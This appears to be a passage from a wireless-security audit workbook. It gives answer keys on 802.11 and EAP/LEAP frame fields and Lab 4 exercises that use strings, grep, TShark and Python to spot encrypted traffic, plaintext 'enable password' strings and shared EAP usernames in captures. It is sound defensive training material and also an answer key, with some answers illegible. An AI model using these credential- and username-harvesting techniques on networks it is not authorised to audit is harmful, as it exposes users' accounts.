(Hint: Consider the recipient of broadcast traffic)

This completes our third lab exercise. Congratulations.
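The EAPOL and EAP headers walked through in section 3.1.4, parsed in Python as an added example that is not part of the workbook: it decodes the EAPOL version/type/length, the EAP code/ID/type, the LEAP count field that sits behind Wireshark's misleading "Peer Challenge [8]" label, and pairs each Request with its Response by EAP ID. The frame bodies, identity strings and challenge bytes are constructed (no 802.11 header, EAPOL payload only); only the EAP ID 33 and the code/type numbers follow the text.

```python
"""Decode 802.1X EAPOL frames and pair EAP Requests with Responses by ID.

Added example, not from the SANS workbook. Frame bodies are CONSTRUCTED
(EAPOL payload only, no 802.11 header) to mirror the lab3-eap.dump exchange
described in the text; identities and challenge bytes are made up.
"""
import struct

EAPOL_TYPES = {0: "EAP-Packet", 1: "EAPOL-Start", 2: "EAPOL-Logoff", 3: "EAPOL-Key"}
EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
EAP_TYPES = {1: "Identity", 17: "LEAP", 21: "EAP-TTLS", 25: "PEAP"}

def parse_eapol(frame):
    """Return the EAPOL header fields and the enclosed EAP packet, if any."""
    if len(frame) < 4:
        raise ValueError("EAPOL header needs 4 bytes")
    version, eapol_type, length = struct.unpack_from("!BBH", frame, 0)
    result = {"version": version, "type": eapol_type,
              "type_name": EAPOL_TYPES.get(eapol_type, "unknown"),
              "length": length, "eap": None}
    body = frame[4:4 + length]
    if len(body) < length:
        raise ValueError("EAPOL body truncated")
    if eapol_type == 0 and length >= 4:          # EAP-Packet carries an EAP header
        result["eap"] = parse_eap(body)
    return result

def parse_eap(body):
    """Decode the EAP header (code, id, length) and the type-specific data."""
    code, eap_id, length = struct.unpack_from("!BBH", body, 0)
    eap = {"code": code, "code_name": EAP_CODES.get(code, "unknown"),
           "id": eap_id, "length": length, "type": None, "type_name": None,
           "data": b""}
    if code in (1, 2) and length >= 5:           # only Request/Response carry a type
        eap["type"] = body[4]
        eap["type_name"] = EAP_TYPES.get(body[4], "type %d" % body[4])
        eap["data"] = body[5:length]
    return eap

def decode_leap(data):
    """LEAP type-data: version, unused byte, count, <count> challenge/response bytes, name.

    The count byte is what the lab's answer key reads to find the 24-byte response.
    """
    version, count = data[0], data[2]
    challenge = data[3:3 + count]
    name = data[3 + count:]
    return {"version": version, "count": count, "challenge": challenge,
            "name": name.decode("utf-8", errors="replace")}

def pair_requests_and_responses(frames):
    """Match each Response to the outstanding Request with the same EAP ID."""
    pending, pairs, unmatched = {}, [], []
    for index, frame in enumerate(frames):
        eap = parse_eapol(frame)["eap"]
        if eap is None:
            continue
        if eap["code"] == 1:
            pending[eap["id"]] = index
        elif eap["code"] == 2:
            if eap["id"] in pending:
                pairs.append((pending.pop(eap["id"]), index, eap["id"]))
            else:
                unmatched.append(index)
    return pairs, unmatched

def eapol(eapol_type, payload=b""):
    """Build an EAPOL frame (version 1) around a payload."""
    return struct.pack("!BBH", 1, eapol_type, len(payload)) + payload

def eap(code, eap_id, eap_type=None, data=b""):
    """Build an EAP packet; Success/Failure have no type byte."""
    body = bytes([eap_type]) + data if eap_type is not None else b""
    return struct.pack("!BBH", code, eap_id, 4 + len(body)) + body

# Constructed exchange: Start, Identity Request/Response, LEAP Request/Response,
# Success. The identity string and user are made up; ID 33 follows the lab.
CONSTRUCTED_EXCHANGE = [
    eapol(1),                                                          # EAPOL-Start, length 0
    eapol(0, eap(1, 32, 1, b"constructed-ap-identity")),
    eapol(0, eap(2, 32, 1, b"jdoe")),
    eapol(0, eap(1, 33, 17, bytes([1, 0, 8]) + bytes(range(8)) + b"jdoe")),
    eapol(0, eap(2, 33, 17, bytes([1, 0, 24]) + bytes(range(24)) + b"jdoe")),
    eapol(0, eap(3, 33)),
]

if __name__ == "__main__":
    for frame in CONSTRUCTED_EXCHANGE:
        print(parse_eapol(frame))
    print(pair_requests_and_responses(CONSTRUCTED_EXCHANGE))
```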
Answers

Section 3.1.1.2

Question: Continue to examine frame 293. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet?
Answer: To DS is 0, From DS is 1. This is an infrastructure packet.

Question: Select frame 320. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet?
Answer: To DS is 1, From DS is 0. This is an infrastructure packet.

Question: Select frame 289. What are the settings of the From DS and To DS fields? Is this packet an infrastructure, WDS or ad-hoc packet?
Answer: To DS is 0, From DS is 0. This is an ad-hoc packet.

Section 3.1.1.3

Question: Select frame 33, what is the duration? Note that the frame size is consistent with frame number 34.
Answer: 8987 (113 bytes)

Question: Select frame 32, what is the duration? Note that the frame size is consistent with frame number 34.
Answer: 9243 (113 bytes)

Question: Select frame 36, what is the duration? Examine the frame size. Is the ratio of duration/packet size consistent with frames 32 and 34?
Answer: 4126 (71 bytes). The frame takes approximately half the time to transmit, with a reduction of 42 bytes.

Question: Select frame 1375. This frame is a WEP authentication frame. What value is listed in the duration field? Note the packet size.
Answer: 314 (30 bytes)

Question: Select frame 1377. This is another frame in the WEP authentication process. What value is listed in the duration field? Note the packet size.
Answer: 314 (160 bytes)

Question: Select frame 1385. This is a frame in the association process. What value is listed in the duration field? Note the packet size.
Answer: 314 (36 bytes)

Question: What is the AID for frame 1385?
Answer: The AID is 0x0a or 10 in decimal

Section 3.1.1.4

Question: Select frame 199. What is the destination address?
Answer: ff:ff:ff:ff:ff:ff (the broadcast address)

Question: Select frame 234. What is the destination address?
Answer: 00:04:23:8b:4f:0c

Section 3.1.1.5

Question: Select frame 1132.
What is the BSSID?
Answer: 00:0b:86:80:54:60

Question: Select frame 1133. What is the BSSID?
Answer: 00:40:96:47:86:ce

Question: Select frame 1134. What is the BSSID?
Answer: (illegible in the scanned copy)

Section 3.1.1.6

Question: Select frame 1124. Examine the contents of the To DS and From DS fields. What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network?
Answer: Source address is 00:04:23:8b:4f:0c, node is on the wireless network, transmitting to the distribution system.

Question: Select frame 1126. Examine the contents of the To DS and From DS fields. What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network?
Answer: Source address is 00:0b:8...0 (partially illegible in the scanned copy), node is on the wired network (distribution system), transmitting to the wireless network.

Question: Select frame 1134. Examine the contents of the To DS and From DS fields. What is the source address of this frame? Is the node using the source address of this frame on the wireless network or the wired network?
Answer: Source address is 00:04:23:63:88:47, node is on the wireless network in ad-hoc mode.

Section 3.1.1.7

Question: Select frame 1365. What is the sequence number? Note the source address.
Answer: 1986 (source 00:40:96:47:86:ce)

Question: Select frame 1368. What is the sequence number? Note the difference between the sequence number in this packet and the packet previously sent by this source.
Answer: 1987 (source 00:40:96:47:86:ce)

Question: Select frame 1367. What is the sequence number? Note the source address.
Answer: 1987 (source 00:40:96:47:86:ce)

Question: Select frame 1368. Note that the sequence number is the same as the previous frame. Examine the frame control header and the flags bits of this frame. Note the flags that are set. What is the likely cause for this packet to use the same sequence number?
Answer: Frame 1368 is a retransmission of frame 1367, and therefore uses the same sequence number.

Section 3.1.2.1

Use the filter "wlan.fc.type_subtype eq 8"

Section 3.1.2.3

Question: Select frame 1387. What is the uptime of the AP?
Answer: 9.14 minutes. The BSS Timestamp is 0x0000000020b251ac or 548,557,228 usec. One million usec in a second is 60,000,000 usec per minute. 548,557,228 divided by 60,000,000 is 9.14 minutes.

Section 3.1.2.4

Question: Select frame 71. Which channel is used for this AP according to the "DS Parameter Set" tag?
Answer: Channel 1 (DS Parameter Set field)

Question: What basic rates are supported by the AP?
Answer: Basic rates include 1, 2, 5.5 and 11 Mbps. This AP also supports 6, 9, 12, 18, 24, 36, 48 and 54 Mbps.

Question: Select frame 1358, what data rates are supported by this AP?
Answer: Data rates include 1, 2, 5.5 and 11 Mbps.

Question: Reference frame 1358. Which channel is used by this AP?
Answer: Channel 1

Section 3.1.3.2

Question: Select frame 1360. Note the frame subtype is "4". What is the destination address? What is the BSSID?
Answer: Destination and BSSID addresses are ff:ff:ff:ff:ff:ff (the broadcast address).

Question: Reference frame 1360. What is the management information included in tag 0? What does this information represent?
Answer: Tag 0 is the SSID "notsoclever".

Question: Reference frame 1360. What is the management information included in tag 1? What does this information represent? How does this information characterize the client that transmitted this frame?
Answer: Tag 1 indicates supported rates of 1, 2, 5.5 and 11 Mbps. This indicates that the AP is likely an 802.11b access point incapable of supporting higher-speed connections.

Section 3.1.3.3

Question: Select frame 1361. Note the frame subtype is "5". Note the destination address in comparison to the source address of frame 1360. What information is supplied to the wireless station with the probe response frame?
Answer: The BSSID of the network is the most important piece of information given to the client.
The client is also provided with all the information in the fixed and tagged management parameters in this frame.

Section 3.1.3.4

Question: Select frame 1375. Expand the management parameters to reveal the Authentication Algorithm. What type of authentication is used in this exchange? Note the authentication sequence number.
Answer: Shared key authentication is used. The authentication sequence number is 0x0001.

Question: Select frame 1376. Expand the fixed parameters management options. What step number does this frame represent? Expand the tagged parameters options. What is the length of the WEP challenge?
Answer: This frame represents step 2 in the WEP authentication process. The length of the WEP challenge is 128 bytes.

Question: Select frame 1381. What is the authentication sequence number? Note that the status code here identifies if the authentication was successful for the client system.
Answer: The authentication sequence number is 0x0004.

Question: How much time was required for the challenge/response authentication process between frame 1375 and 1381?
Answer: .007 seconds

Section 3.1.3.5

Question: Select frame 1383. What is the frame control subtype? What tagged parameters are included in this management frame?
Answer: The frame control subtype is 0. Tagged parameters include the network name (SSID), and supported rates.

Question: Select frame number 1385. What is the frame control subtype? What field indicates if the AP can support the requested association? What value indicates a successful association request?
Answer: The frame control subtype is 1. The status code in the tagged management parameters indicates the AP can support the association request, with a value of 0x0000 to indicate successful association.

Section 3.1.4.1

Question: Refer to frame 1. What is the version number and the type for 802.1x Authentication?
Answer: Version is 1, type is 1 (start)

Section 3.1.4.2

Question: Is this packet from the AP or from the wireless station?
Answer: This packet is from the AP (From DS is 1, BSSID matches the source address).

Question: What is the value in the EAP Code field in this frame? Note the EAP Id number.
Answer: The EAP Code is 1 or a "Request" message.

Question: Note the 45-byte identity string that is included in this identity request frame. What device is being identified with this string?
Answer: This string is identity information from the AP, and indicates the use of a Cisco AP-350 access point with the string "AP350".

Section 3.1.4.3

Question: What is the EAP Code for frame number 3?
Answer: The EAP Code is 2 or a "Response" message.

Question: What is the identity information associated with this response frame?
Answer: The identity information is "jwright", the username of the authenticating station.

Section 3.1.4.4

Question: What is the EAP type used in frame number 4? How can you tell? Note the EAP ID number.
Answer: The EAP Type in frame 4 is 17 or "LEAP".

Section 3.1.4.5

Question: How does the AP associate the EAP Response in frame number 5 with the previous EAP Request frame?
Answer: The ID field is consistently 33 for this exchange.

Question: How long is the response data in the "Peer Challenge" portion of the frame?
Answer: The peer challenge is 24 bytes as indicated by the "Count" field. Wireshark is misleading here, including the number 8 in the description of the peer challenge.

Section 3.1.4.6

Question: What is the status of authentication in frame number 6?
Answer: The EAP code in frame 6 is "3" to indicate successful authentication.

Question: How does the AP associate the EAP Request and the EAP Response in previous frames with the Success/Failure message in frame number 6?
Answer: The ID field is consistently 33 for this exchange.

Section 3.1.4.8

Question: Examine frame 9. What type of data is this key used to encrypt?
Answer: This key is used to encrypt unicast traffic, as indicated in the Key Index field.
Lab 4 - WLAN Audit Methodologies

Complete the exercises in this lab to reinforce the material covered in the WLAN Audit Methodologies module. To complete these exercises, you will need the materials included in the SWAT toolkit.

Lab 4-1: Identifying Encrypted Traffic

Purpose: This lab will give the student hands-on experience working with a tool to generate a histogram of network traffic byte distribution.

Description: In this lab we will use the pcaphistogram tool to assess the contents of supplied packet capture files. Each packet capture will generate a distinct view of traffic byte distribution in a traffic histogram that can be used to assess the contents of the data as encrypted or unencrypted.

4.1.1. Examine Pcaphistogram Options

The pcaphistogram tool is a short Perl script that accepts a libpcap file as input and generates a report based on the byte distribution observed in the file. The output report is read by the GNUplot software to generate images from a given data set. GNUplot is a graphing tool used for a wide variety of functions and is included in the lab CD. Change to the directory where the pcaphistogram software is and run the tool with no parameters to see usage information.

# cd /tmp/lab4/pcaphistogram
# pwd
/tmp/lab4/pcaphistogram
# ls
capture1.dump  capture3.dump  capture5.dump  gnuplot
capture2.dump  capture4.dump  capture6.dump  pcaphistogram.pl
# ./pcaphistogram.pl
pcaphistogram: Generate a data file histogram of a libpcap file.
usage: pcaphistogram filename.dump | gnuplot
gnuplot will create a histogram called filename.png
#

We see from the file listing ("ls") that several packet capture files are included, as well as the files "gnuplot" and "pcaphistogram.pl". Running the pcaphistogram tool, the example usage indicates that pcaphistogram takes one input parameter: the name of the libpcap file. Passing the output of pcaphistogram to the gnuplot tool will create a PNG image file with the same name as the libpcap input file.
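The byte-distribution test behind pcaphistogram, as an added Python example (not the workbook's Perl script and not gnuplot): it parses the libpcap file format, counts payload byte values 0x00 to 0xFF, and reports Shannon entropy, where a flat distribution approaching 8 bits per byte is what a histogram of encrypted traffic shows. The two captures are constructed in memory, and the 14-byte link-layer skip assumes Ethernet framing rather than the 802.11 framing of the lab captures.

```python
"""Byte-distribution histogram of libpcap packet payloads, as in Lab 4-1.

Added example, not the workbook's pcaphistogram.pl. It reads the classic
libpcap format (24-byte global header, 16-byte record headers), skips a fixed
link-layer header length so that only payload bytes are counted, and reports
how flat the distribution is. Both captures below are CONSTRUCTED in memory;
no file from the lab is used.
"""
import math
import random
import struct
from collections import Counter

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1

def iter_pcap_payloads(data, skip_bytes):
    """Yield the payload of each record after validating the global header."""
    if len(data) < 24:
        raise ValueError("not a libpcap file")
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:           # written on a big-endian host
        endian = ">"
    else:
        raise ValueError("unknown libpcap magic 0x%08x" % magic)
    offset = 24
    while offset + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, offset)
        offset += 16
        record = data[offset:offset + incl_len]
        if len(record) < incl_len:
            raise ValueError("truncated record at offset %d" % offset)
        offset += incl_len
        yield record[skip_bytes:]

def payload_histogram(data, skip_bytes=14):
    """Count occurrences of each byte value 0x00..0xFF across all payloads."""
    counts = Counter()
    for payload in iter_pcap_payloads(data, skip_bytes):
        counts.update(payload)
    return [counts.get(value, 0) for value in range(256)]

def shannon_entropy(histogram):
    """Bits per byte; 8.0 means perfectly flat, which encrypted payload approaches."""
    total = sum(histogram)
    if total == 0:
        return 0.0
    return -sum((c / total) * math.log2(c / total) for c in histogram if c)

def classify(histogram, threshold=7.5):
    """Crude verdict matching the visual test in the lab: flat means likely encrypted."""
    entropy = shannon_entropy(histogram)
    verdict = "likely encrypted" if entropy >= threshold else "likely plaintext"
    return verdict, entropy

def build_pcap(payloads):
    """Write an Ethernet-linktype libpcap file with a constructed 14-byte header per frame."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    fake_eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    for n, payload in enumerate(payloads):
        frame = fake_eth + payload
        out += struct.pack("<IIII", 1_000_000 + n, 0, len(frame), len(frame)) + frame
    return out

# Constructed captures: seeded pseudo-random bytes stand in for encrypted
# payload; repeated HTTP-like text stands in for plaintext.
_rng = random.Random(617)
CONSTRUCTED_ENCRYPTED = build_pcap(
    [bytes(_rng.randrange(256) for _ in range(512)) for _ in range(16)])
CONSTRUCTED_PLAINTEXT = build_pcap(
    [b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n" * 8] * 16)

if __name__ == "__main__":
    for name, cap in (("encrypted", CONSTRUCTED_ENCRYPTED), ("plaintext", CONSTRUCTED_PLAINTEXT)):
        verdict, entropy = classify(payload_histogram(cap))
        print("%s: %s (%.2f bits/byte)" % (name, verdict, entropy))
```

To plot a real capture the way the lab does, write the 256 histogram values to a file and feed it to gnuplot.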
NOTE: Because we are executing files in the current directory, we must prefix the command with "./" to indicate that the file should be run from the current directory and not from the system PATH, as shown below.

4.1.2. Create a Traffic Histogram

Generate a traffic histogram for the capture1.dump libpcap file, as shown below.

# ./pcaphistogram.pl capture1.dump | ./gnuplot

Note that it may take several minutes to complete assessing this file as it contains over 11MB of traffic. When pcaphistogram finishes assessing the file, gnuplot will create a file named "capture1.png". We can view this file with the "display" utility, as shown below.

# ls -l capture1.png
-rw-r--r--  1 root root 2753 Sep 16 08:00 capture1.png
# display capture1.png &

The histogram should look similar to the image that follows.

[Figure: Packet payload histogram for "capture1.png"]

In this example, we can see a very narrow distribution of payload bytes, indicating the presence of encrypted traffic. The X-axis indicates the byte values observed in the file in their hexadecimal representation (e.g. 0x00 to 0xFF). The Y-axis indicates the frequency, with the frequency of this packet capture hovering around 40,000 for each byte value.

4.1.3. Assess the Remaining Packet Capture Files

Repeat the previous step for each supplied packet capture file, assessing the histogram that is created to identify if the traffic indicates encrypted or unencrypted content. The answers and traffic used to generate these captures are presented on the last page of the lab 4 materials.

Lab 4-2: Assessing Plaintext Strings

Purpose: Introduce the use of the Unix "strings" tool to quickly identify potential information disclosure.

Description: In this lab we'll assess the contents of a supplied packet capture using the "strings" tool.
This allows us to quickly identify plaintext information in a packet capture file with standard Linux tools, allowing the auditor to quickly narrow in on potential information disclosure risks.

4.2.1. Examine "strings" Options

The strings tool is very simple to use, offering few command-line options. Examine the contents of the strings manual page by running "man strings", as shown below. Be sure to examine the command-line options for strings and any listed bugs.

# man strings

Question: What is the strings "-n" option used for?

4.2.2. Collecting ASCII Strings from "strings-sample.dump"

Collect the strings that are present in the supplied "strings-sample.dump" file, piping the output to a file, as shown below.

# cd /tmp/lab4
# ls strings-sample.dump
strings-sample.dump
# strings strings-sample.dump >strings-sample.txt
# kedit strings-sample.txt &
[2] 3695

Inspect the contents of the "strings-sample.txt" file and answer the questions that follow. Quit kedit after completing this step.

Question: Are all the strings listed in the file readable?
Question: What would cause unreadable strings in the file?
(Hint: Check the manual page for strings, BUGS section)
Question: How long are the majority of the strings that are not readable?
Question: How can we eliminate many of these non-readable strings?
(Hint: Consider the strings "-n" option)

4.2.3. Focus on Longer Strings

Since there are so many short strings in the file that do not represent readable ASCII, we can eliminate them by assessing the file with the strings "-n" option. Note that this will eliminate any potentially informative strings that are less than the specified length. Re-create the "strings-sample.txt" file for strings that are at least 12 bytes in length, as shown below.

# strings -n 12 strings-sample.dump >strings-sample.txt
# kedit strings-sample.txt &
[1] 3697

Notice the file is now mostly readable ASCII strings, representing HTTP requests and other traffic.
At over 36,000 lines however, there is still a lot of information to review. Close kedit after briefly examining the file contents.

4.2.4. Parse Strings Data

We can use the Unix "grep" tool to quickly identify interesting information in the strings output file. You can use any keyword to search for potentially interesting information; we'll use the string "password" for our example. First, look at the manual page for the grep command. Identify the option that can be used with grep to force it to ignore the case of the data it searches for, matching "password", "PASSWORD", "Password", etc.

# man grep

Question: What option can be specified with grep to perform case-insensitive searches?

Next, use the grep command to search for case-insensitive instances of the string "password" in the "strings-sample.txt" file. Pipe the output of this command to the "password-grep.txt" file, as shown below.

# grep -i password strings-sample.txt >password-grep.txt
# kedit password-grep.txt &
[1] 3702

Next, open the "password-grep.txt" file with kedit. The text content of an eBay page will be seen, followed by some strings that should immediately arouse concern. Quit kedit after completing this step.

Question: What strings are observed in the password-grep.txt file that are of concern?
(Hint: Look for Cisco IOS-like strings)
(Hint: Lines 7 and 8)

4.2.5. Locate Corresponding Packets

While the information presented by the strings tool is interesting, we really need to see the information in the context of the packets that contain the strings. We can use a Wireshark display filter to locate the packets with the "contains" operator. First, open the strings-sample.dump file in Wireshark. You can start Wireshark by clicking "K > Run Command ...", entering the command "wireshark" in the Command dialog box, then clicking "Run". After Wireshark starts, click "File > Open" and navigate to the /tmp/lab4 folder. Wireshark will open and dissect the packet capture file, as shown below.
[Screenshot: Wireshark display of packets in the strings-sample.dump file]

We can reference the entire contents of a packet with the "frame" display field name. Apply a display filter on the "frame" display field name with the "contains" operator, looking for the string "enable password".
(Hint: Specify the display field name, the operator, then the string to match)
(Hint: Surround the string to match with double-quotes)
(Hint: The filter should return 1 packet)
(Hint: frame contains "enable password")

Scroll to the bottom of the packet detail window to see the packet content. This isn't the easiest view to read, so let's take a look at another useful Wireshark feature: "Follow TCP Stream".

4.2.6. Reassemble Transaction

By right-clicking on a frame, we can select the option to have Wireshark reassemble the entire transaction associated with one packet, and display the contents in an easy-to-read format. Right-click on the packet that is displayed after applying the display filter in the previous step, then click "Follow TCP Stream". Wireshark will automatically apply a display filter to include only the packets for the selected stream, and will open the "Stream Content" dialog box, as shown below.

[Screenshot: Wireshark stream content representation window]

In the Stream Content dialog, text that is highlighted in red represents one side of the conversation (usually the client, or initiating side), and the blue text represents the other side of the conversation (usually the server, or responding side).
Inspect the stream content information presented by Wireshark and answer the questions that follow. Quit Wireshark at the end of this lab.

Question: Is the configuration of a production PIX firewall revealed?
Question: What is the potential impact to the organization where this information was disclosed?

Lab 4-3: Evaluating EAP Username Disclosure

Purpose: Introduce a technique that can be used to assess the usernames disclosed on 802.1x/EAP networks.

Description: In this lab we will assess traffic in a supplied packet capture file to identify the usernames in multiple EAP transactions, identifying a single username that is used by multiple stations.

4.3.1. Introduction to TShark

TShark is a text-based Wireshark tool. Instead of providing a graphical user interface to view the contents of packets and their dissected protocol contents, TShark displays the information in a simple text-based format. This is useful for us as auditors, since it allows us to work with protocol dissection information with other standard Unix utilities.

Display the contents of the file "multiple-eap.dump" in the /tmp/lab4 folder with TShark, using the following command-line options.

Command option   Argument (if any)    Description
-r               multiple-eap.dump    Read the file "multiple-eap.dump" as an input
-n                                    Do not perform name resolution on IP addresses or MAC addresses
-V                                    Print the packet dissection view of the packets

# tshark -r multiple-eap.dump -n -V
Frame 1 (28 bytes on wire, 28 bytes captured)
    Arrival Time: Sep 16, 2004 06:49:37.000000000
    Time delta from previous packet: 0.000000000 seconds
    Time since reference or first frame: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 28 bytes
    Capture Length: 28 bytes
IEEE 802.11
    Type/Subtype: Data (32)
    Frame Control: 0x0208 (Normal)
        Version: 0
#

A tremendous amount of information will be displayed on your screen. Note that we can redirect the output of TShark to a file that we can view at a later time with kedit or other tools.
Fortunately, we can apply display filters with TShark to limit the packets that are displayed. Use TShark to print the contents of the multiple-eap.dump file again, this time using the following command-line options.

Command option   Argument (if any)    Description
-r               multiple-eap.dump    Read the file "multiple-eap.dump" as an input
-n                                    Do not perform name resolution on IP addresses or MAC addresses
-V                                    Print the packet dissection view of the packets
-R               "eapol"              Apply the display filter "eapol". Must include quotes around the display filter.

# tshark -r multiple-eap.dump -n -V -R "eapol"
Frame 9 (40 bytes on wire, 40 bytes captured)
    Arrival Time: Sep 16, 2004 06:49:37.000008000
    Time delta from previous packet: 0.000001000 seconds
    Time since reference or first frame: 0.000008000 seconds
    Frame Number: 9
    Packet Length: 40 bytes
    Capture Length: 40 bytes
IEEE 802.11
    Type/Subtype: Data (32)
    Frame Control: 0x0108 (Normal)
...

4.3.2. Identifying EAP Usernames

Unfortunately, neither Wireshark nor TShark permit the use of display filtering on the username information in the protocol dissector. As a workaround, we can pipe the output of the TShark protocol dissector to standard Unix utilities.

Identify usernames that are used for EAP authentication in the multiple-eap.dump file, using the grep command to extract only lines that include the string "Name":

# tshark -r multiple-eap.dump -n -V -R "eapol" | grep Name
Name (5 bytes): nthom
Name (5 bytes): nthom
Name (5 bytes): nthom
Name (5 bytes): nthom
Name (5 bytes): plynn
Name (5 bytes): plynn
Name (5 bytes): plynn
Name (5 bytes): plynn
#

In this output we have multiple instances of the same username listed.
Note that this does not indicate that the same username is used for multiple stations; rather, it just reflects that the username appears in multiple packets in the capture file, which is not unusual.

Parse the contents of the usernames in the multiple-eap.dump file again, this time passing the output of grep to the Unix "sort -u" command to generate a sorted list of unique usernames, eliminating duplicates.

# tshark -r multiple-eap.dump -n -V -R "eapol" | grep Name | sort -u
Name (5 bytes): hbonn
Name (5 bytes): nthom
Name (5 bytes): plynn
Name (6 bytes): pomith
Name (7 bytes): llamont
#

With this command, we've identified five usernames in the multiple-eap.dump file. As part of an audit, this information should be documented as a potential information disclosure risk. Let's continue our assessment to see if any of these usernames are used by multiple stations on the network.

4.3.3. Correlate Users to MAC Addresses

Even though Wireshark doesn't allow us to specify EAP usernames in display filters, we can use the "contains" operator functionality on the "eap" display field to identify frames with specific usernames. By applying a display filter that includes only a specified username, we can quickly assess the MAC addresses in use.

First, open the "multiple-eap.dump" capture file using Wireshark from the command line or from the Backtrack menu. Next, apply a display filter for the username "hbonn" on the "eap" field:

eap contains "hbonn"

This will generate a list of packets that contain the string "hbonn" in the "eap" display field, as shown below. We could apply a similar filter to the "frame" display field, but it is not necessary to search the entire packet for the username string; we can speed up the display filter by limiting the search to just the "eap" field.
Wireshark display of all packets with "hbonn" in the "eap" field.

Note that this display includes multiple source MAC addresses. This is because the username appears in both packets from the wireless station and from the access point. We can apply an additional display filter to limit the display to packets from the client, or those packets with the To DS bit set in the frame control header:

eap contains "hbonn" and wlan.fc.tods

Apply this display filter to display all packets with the username "hbonn" that are from wireless client systems. The packet display should appear as follows.

Wireshark display of all packets from wireless clients with "hbonn" in the "eap" field.

Examine the source MAC address for each packet that is returned by the display filter.
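The grep/sort -u pass of step 4.3.2 and the per-username "To DS" filter of this step can be run as one script over the text TShark produces, which is what a recurring audit of EAP identity disclosure would do. The following is an added example, not the workbook's or Backtrack's own code. It parses a constructed, heavily abbreviated dissection in the style of "tshark -V -R eapol" (real output has many more lines per frame, and the "To DS:" line is simplified from Wireshark's flag rendering); the access point address 02:00:00:00:aa:01 is made up, and only frames with the To DS bit set count as client stations.

```python
"""Audit EAP identity disclosure in tshark -V output and flag shared usernames.

Added example, not part of the workbook. It folds the grep/sort -u step and the
per-username MAC correlation into one pass: only frames with the To DS bit set
(client -> AP) count as a client station, so the access point's copies of the
EAP-Identity exchange do not inflate the station list.
"""
import re
from collections import defaultdict

# Constructed, abbreviated dissection in the style of
# `tshark -r multiple-eap.dump -n -V -R "eapol"`. Only the three fields the
# parser keys on are kept; "To DS:" is simplified from Wireshark's flag line.
# The AP address 02:00:00:00:aa:01 is a made-up locally administered address.
SAMPLE_DISSECTION = """\
Frame 9 (40 bytes on wire, 40 bytes captured)
IEEE 802.11
    To DS: 1
    Source address: 00:0a:8a:47:db:7b
    Name (5 bytes): hbonn
Frame 10 (40 bytes on wire, 40 bytes captured)
IEEE 802.11
    To DS: 0
    Source address: 02:00:00:00:aa:01
    Name (5 bytes): hbonn
Frame 15 (40 bytes on wire, 40 bytes captured)
IEEE 802.11
    To DS: 1
    Source address: 00:09:b7:13:a8:27
    Name (5 bytes): nthom
Frame 16 (40 bytes on wire, 40 bytes captured)
IEEE 802.11
    To DS: 0
    Source address: 02:00:00:00:aa:01
    Name (5 bytes): nthom
Frame 21 (40 bytes on wire, 40 bytes captured)
IEEE 802.11
    To DS: 1
    Source address: 00:40:96:42:bd:08
    Name (5 bytes): nthom
Frame 30 (42 bytes on wire, 42 bytes captured)
IEEE 802.11
    To DS: 1
    Source address: 00:0a:8a:47:db:7b
    Name (7 bytes): llamont
Frame 33 (42 bytes on wire, 42 bytes captured)
IEEE 802.11
    To DS: 1
    Source address: 00:40:96:a0:4c:5c
    Name (7 bytes): llamont
"""

FRAME_RE = re.compile(r"^Frame \d+ ", re.M)
TODS_RE = re.compile(r"To DS: (\d)")
SRC_RE = re.compile(r"Source address: ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I)
NAME_RE = re.compile(r"Name \(\d+ bytes\): (\S+)")


def parse_frames(text):
    """Split the dissection into frames and pull out (to_ds, src, name).

    Frames without an EAP identity field are dropped, as `grep Name` would.
    """
    records = []
    for block in FRAME_RE.split(text)[1:]:  # chunk 0 precedes the first frame
        tods, src, name = TODS_RE.search(block), SRC_RE.search(block), NAME_RE.search(block)
        if not (tods and src and name):
            continue
        records.append({"to_ds": tods.group(1) == "1",
                        "src": src.group(1).lower(),
                        "name": name.group(1)})
    return records


def unique_usernames(records):
    """Equivalent of `grep Name | sort -u`, minus the byte-count prefix."""
    return sorted({r["name"] for r in records})


def client_stations(records):
    """Map each username to the client MACs that sent it (To DS set only)."""
    by_user = defaultdict(set)
    for r in records:
        if r["to_ds"]:
            by_user[r["name"]].add(r["src"])
    return {user: sorted(macs) for user, macs in by_user.items()}


def shared_usernames(records):
    """Usernames seen from more than one client station: the policy violation."""
    return {u: macs for u, macs in client_stations(records).items() if len(macs) > 1}


if __name__ == "__main__":
    recs = parse_frames(SAMPLE_DISSECTION)
    print("Usernames disclosed:", ", ".join(unique_usernames(recs)))
    for user, macs in shared_usernames(recs).items():
        print(f"SHARED {user}: {' '.join(macs)}")
```

Feeding it real output is a matter of replacing SAMPLE_DISSECTION with the text read from the TShark pipe; the only maintenance point is the "To DS" regex, which has to match whatever the installed Wireshark version prints for that flag.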
From the filtered packet list, we can see that only one station, with the MAC address "00:0a:8a:47:db:7b", is listed. From this analysis, we can determine that only one station in our packet capture is using the username "hbonn" for authentication. Reapply the display filter for each username that is identified in the previous step.

Question: Which username(s) are used from multiple client stations?

Question: What are the MAC addresses of the client stations that are sharing usernames?

Question: How can an administrator use this information to enforce a policy that forbids sharing usernames?

This completes our fourth lab exercise. Congratulations.

Answers

Section 4.1

The pcaphistogram analysis for each supplied packet capture is presented below.

Capture 1

The traffic histogram for capture1.dump indicates a very narrow distribution of traffic. This packet capture was generated by accepting a random stream of data from the Linux /dev/urandom device, encrypting the content with PGP and transmitting it over a TCP socket with Netcat.

Capture 2

Packet Payload Histogram for capture2.dump

The traffic histogram for capture2.dump indicates a wide distribution of characters with a cluster of characters peaking near the ASCII printable character set (hex 0x61 is "a", 0x7a is "z"). This traffic was generated by transmitting an unencrypted ASCII dictionary file between two hosts over a TCP socket with Netcat.

